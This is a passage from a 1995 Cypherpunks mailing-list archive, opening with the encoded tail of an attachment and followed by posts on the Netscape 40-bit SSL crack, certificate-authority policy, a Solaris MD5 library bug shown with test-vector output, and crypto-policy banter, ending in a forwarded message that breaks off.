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
3DNWBz4LWCVhDivHxhgAQgPRu2FYGTYeRvqasemVjSoJ+x30tTr11zCsm7XN
rkYLUFJQ8LKlmsY7g+VHIBdEeVBmqGVGG26ZPWoauZC1f/D5ugYT6AGg2/VN
SzD7QFOoGF49sMAeaEzESYF+z24vVg7B6TZsq0b94QSArfIdMcQcaKWQJQzl
AieCuY4dEEDpQWxxYPn2NJAjWTc3VdjpyJjSmMFCqAKyQgQxQiR2BgZ5CKU1
EpsgvrSMtYivglsaJxvmMrVoCBnsQQNj3YElB6vsklgS2xvaSL/A3RsGwta2
zAwaRlYE1wFgmXJhy3rGK4mtBKEIr2BH+MFCJEBsTA888apBAeAzm2QCGRcr
gsJXN1S5bBQ+QA2YDSzBTjMHxIky3i0tgh/fiGAG5jqXyVJJbzx0YL7PwZnB
SQHWmcvUlvHCwobimnFg2HTTKOqQRzEQzgKeAYFhTS+bPedLGFovZLa6ATEA
ATTDD1C9gTEFgcB3jeUKmwfdDGCKy0ZtNKLPwCipoKxW9IEuwJZio6PD5MGS
i6X8QB+szVgSobRFRS0yxOM+09beZDRajJMeLO6bQfB6MumHw0Xv078pGhwN
wz2KUbsPrgf47/+eXcfD4SZci4fklRm82ILz51/3/+EX7///lb7nf/37699f
//61//6K//8r/v+v+P+/4v//iv//ByPd/4r//yv+/6/4/7/i//+K//8r/v+v
+H/vX/hX/P9/239/xf//vx3///8B8ZlYCgBgAgA=
--Boundary..3932.1071713491.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 18 Aug 95 16:01:35 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape security
Message-ID: <199508182301.TAA08043@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by altitude@cic.net (Alex Tang) on Fri, 18 
Aug  2:52 PM


>It seems that one of the problems with Damien's 
>cracking job was that it  was "not sanctioned".  Look 
>at the WSJ article, they didn't mention his  
>name...they just called him "a hacker".  It shows how 
>public opinion still  sees groups like the cypherpunks 
>as just that, a bunch of punks. 
>
>With some "respected" business on our side, it may make 
>a much bigger  impact (better publicity, better 
>leverage, etc.).


   While the WSJ story mentioned no names, other than the
   esteemed CypherName and our cypheragent who lured the
   reporter, later stories have given individual credit and
   amplified the "mainstream" impact of the cabalistic hacker
   culture crack.

   This segue may be due to the PR-mad corporations and the
   LEA's seeking to profit by the drama given to outsiders to
   get their safety-products approved, to pose themselves as
   being more devoted to the public weal than the devil-
   punks (liars or inadverdent truthsayers?).

   Or, it may just be a more interesting (lucrative) to pump
   the outsider, hacker aspect. Reporting on hackerdom has
   been oft used to boost a shrewd wannabe-an-insider's rep in
   the mainstream -- no names now, you know who they are, most
   are doing quite well, Zarathrustra bless their complicit
   Guccioni-success.

   So, hackers, punks, cypherpunks, up all night, right, watch
   them come calling for an interview when you misbehave in
   outrageous and wondrous and techno-magical ways. Gotta get
   lurid stories to allure the customer/advertiser/voter.

   Damien, Hal and the SSL-non-anonymous hackers, watch your
   backs, think of Kevin and his oh-so-admiring, trust-me
   provocateurs.

   Just my Time-averse sensor-jigger, sensing threat models.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Fri, 18 Aug 95 16:13:39 PDT
To: cypherpunks@toad.com
Subject: Re: WhiSSLing in the Dark
Message-ID: <199508182312.TAA13928@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




>Netscape Encrypted Data Cracked
>
>Tokyo, Japan, Aug. 18 (NB) -- ...
>
>Many companies working on secure transaction systems hope
>the much more secure 128-bit code version of the system
>will be available for export eventually. This is said to
>be almost unbreakable, requiring a trillion times more
>processing power to crack than the 40-bit version.  ...

Notice how the "over a trillion times more" has devolved into simply "a
trillion times more" -- and we all know that the former statement was a
gross underestimate, reminiscent of the claim of "over 3 billion
combinations" on Ideal's packaging for Rubik's cube.

Of course the real reason the media have standardized on trillian for
this is that they know it is the biggest number the bulk of their
audience is familiar with, and that if they said 3e26 or even "three
times ten to the twenty-sixth power" they would snow most of their
readers/viewers.  (To be fair, I think the WSJ did say 10^26, with a
brief explanation of what that meant.  I congratulate them for not
"talking down" to their readers.)

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 18 Aug 95 20:10:37 PDT
To: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Subject: Re: Certificates/Anonymity/Policy/True Names
Message-ID: <ac5aa46b1e0210041773@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:26 AM 8/19/95, Michael Froomkin wrote:
>Bill Stewart asks what follows from "prohibit".  In the model I am, um,
>hypothesizing, CAs that play by the rules are entitled to certain safe
>harbors shielding them from potential liability (e.g. can't be sued if
>their certificate was used in a transaction that went bad through no
>fault of theirs).   No other behaviour or act is banned, but other,
>private, alternatives may suffer a coompetitive disadvantage since they
>would lack the certainty that they could not be sued.

Then I suggest you use a different word than "prohibit." To many of us,
this implies illegality, men with guns, early morning raids, and Janet
Reno.

You don't seem to mean this.

By the way, is this really just an excercise, or are you perchance involved
in the goings-on with policy on crypto? (Not making any accusations, just
noting that various crypto policy groups are reported to be meeting...the
National Research Council thing, the key escrow initiatives, etc.)

Encrypting minds want to know.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: michael shiplett <walrus@ans.net>
Date: Fri, 18 Aug 95 17:45:38 PDT
To: cypherpunks@toad.com
Subject: Sun's buggy MD5?
Message-ID: <199508190045.UAA148800@bugsy.aa.ans.net>
MIME-Version: 1.0
Content-Type: text/plain


Here's something fun to do on Solaris 2.3 or 2.4.  Notice the
similarity among the Solaris md5 output. Anyone know why this is?

The Sun service folk weren't able to point me to a Solaris bug-report
email address. I had a similar experience looking through www.sun.com.
Pointers are welcomed.


PROBLEM:
    A program which uses md5 from a dynamically linked
    (or loaded) library and the nsl library is loaded before a
    ``standard'' md5 library will get md5 results different from the
    rest of the non-Solaris world.


NOTES:
    the non-Solaris md5 files are from RFC 1321.

    some test output has been deleted as it does not fit nicely on a
    standard message line.

    solmd5 seems to give slightly different output on different machines
    and greatly different output with different compilers

    the nsl library is required on Solaris 2.4 when using sockets.

    /usr/include/sys/ppp_chap.h includes a slightly modified---mainly
    names---version of md5.h.


% gcc -o md5 mddriver.c md5c.c 
% gcc -o solmd5 mddriver.c -lnsl
% ./md5 -x
MD5 test suite:
MD5 ("") = d41d8cd98f00b204e9800998ecf8427e
MD5 ("a") = 0cc175b9c0f1b6a831c399e269772661
MD5 ("abc") = 900150983cd24fb0d6963f7d28e17f72
MD5 ("message digest") = f96b697d7cb7938d525a2f31aaf161d0
MD5 ("abcdefghijklmnopqrstuvwxyz") = c3fcd3d76192e4007dfb496cca67e13b
MD5 ("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
= d174ab98d277d9f5a5611c2c9f419d9f
% ./solmd5 -x
MD5 test suite:
MD5 ("") =               f00001c0effffba8429b59d50529097c
MD5 ("a") =              f00003c0effffba8aec5fcf4284a8dbe
MD5 ("abc") =            f00005c0effffba896fc8af8ca60a911
MD5 ("message digest") = f00007c0effffba8f373218f317a9558
MD5 ("abcdefghijklmnopqrstuvwxyz") = f00009c0effffba896b4f24acb3f4738
MD5 ("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
= f0000bc0effffba8cef237a614aa457d


michael




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Fri, 18 Aug 95 18:26:38 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <199508182342.QAA20924@ix7.ix.netcom.com>
Message-ID: <Pine.3.89.9508182137.A620886391-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart asks what follows from "prohibit".  In the model I am, um, 
hypothesizing, CAs that play by the rules are entitled to certain safe 
harbors shielding them from potential liability (e.g. can't be sued if 
their certificate was used in a transaction that went bad through no 
fault of theirs).   No other behaviour or act is banned, but other, 
private, alternatives may suffer a coompetitive disadvantage since they 
would lack the certainty that they could not be sued.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Fri, 18 Aug 95 18:29:00 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <ac5a50771d0210045def@[205.199.118.202]>
Message-ID: <Pine.3.89.9508182135.A620886391-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim May says that having govt == root is a step down the slippery slope.
If we say that others can set themselves up as root too, and that
web-of-trust is not prohibited, but that CAs which take part in the
govt-as-root hierarchy get some advantages (liability caps, primarily),
what are the dangers? 

National ID cards is one possibility (key becomes a functional ID).
Others?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Fri, 18 Aug 95 18:32:03 PDT
To: Howard Cheng <howard@cs.ualberta.ca>
Subject: Re: Economic Model for Key Cracking
In-Reply-To: <95Aug18.162938-0600_mdt.13069-7+113@scapa.cs.ualberta.ca>
Message-ID: <Pine.3.89.9508182136.A620886391-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Didn't Ross Perot make his fortune by running data processing tasks nights 
and weekends on machines he leased to other people (all legal)?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Fri, 18 Aug 95 13:08:16 PDT
To: cypherpunks@toad.com
Subject: Re: Exportable if Escrowed Changes Nothing!
Message-ID: <199508181945.VAA26128@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Joey Grasty writes:
 > Governments:  can't live with 'em, can't shoot 'em.
                                      ^^^^^^^^^^^^^^^

It is precisely this kind of self-defeating pessimism that has allowed
the current state of affairs to develop.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 18 Aug 95 21:38:55 PDT
To: cypherpunks@toad.com
Subject: Perot and Scrap Cycles
Message-ID: <ac5aa76b1f021004cbdc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:31 AM 8/19/95, Michael Froomkin wrote:
>Didn't Ross Perot make his fortune by running data processing tasks nights
>and weekends on machines he leased to other people (all legal)?

I hadn't heard this.

And until I hear more details, I'm skeptical.

(Trivia sidenote: I was in high school in 1970 and met Ross Perot at a
shindig in Dallas--his wife picked me up at the airport and drove me to the
hotel. He had just that spring lost a billion dollars in a single day, due
to a glitch in EDS stock. A billion dollars in 1970 was a lot of money.)

Now in 1970 EDS was indeed leasing lots of IBM mainframes to customers, and
running them. Also, doing processing jobs.

But how many IBM mainframes were idle at night? Not many. This was the day
of multimillion dollar mainframes and programmers making $10,000 a year to
keep them busy at all times.

So, I doubt the machines were idle in the same way our workstations and PCs
are largely idle (obviously, machines now cost less $2000-6000, and
programmers make 10-20 times that...the tables have turned).

I don't discount the possibilty that EDS made a deal on the lease rates. I
haven't read up on EDS in this era. I just know that Perot wasn't using
"scrap cycles" (to use Doug Barnes' term), because there probably weren't
many of them.

But I'd like to hear the details.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Fri, 18 Aug 95 18:51:29 PDT
To: cypherpunks@toad.com
Subject: Re: Exportable if Escrowed Changes Nothing!
Message-ID: <199508190150.VAA39657@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> Joey Grasty writes:
>  > Governments:  can't live with 'em, can't shoot 'em.
>                                       ^^^^^^^^^^^^^^^
> 
> It is precisely this kind of self-defeating pessimism that has allowed
> the current state of affairs to develop.
> 
> 

You grossly misinterpreted my remark.  I believe that socialist-statism
exhibited by the current US gov't is about to crack due to overspending
and technology.  Whether it will go peacefully or not is another question.
I stand ready to defend myself if necessary, but I prefer to kick the
statists in the ass by deploying strong encryption.  When information
can flow, the statists lose.  They know that; witness the frantic effort
to outlaw encryption.  Too late, though.

I'm writing code to hasten the end of the statists.  Just what are you 
doing besides hiding behind anonymity?

Regards,

--
Joey Grasty
jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann
PGP = A7 CC 31 E4 7E A3 36 13  93 F4 C9 06 89 51 F5 A7




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 18 Aug 95 21:59:48 PDT
To: cypherpunks@toad.com
Subject: Vacation
Message-ID: <199508190458.VAA16245@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to be bugging out at such an interesting time, but I will be on
vacation from Aug 19 through Aug 26.  Hope to see a lot of CPs at
Crypto -

Hal Finney




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 18 Aug 95 22:47:18 PDT
To: cypherpunks@toad.com
Subject: NSA into antigravity?
Message-ID: <199508190533.WAA14801@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



this apparently involves credible researchers, and it's something 
that would be pretty bizarre if the NSA is really implicated..

------- Forwarded Message

Date: Fri, 18 Aug 95 18:04:09 -0700
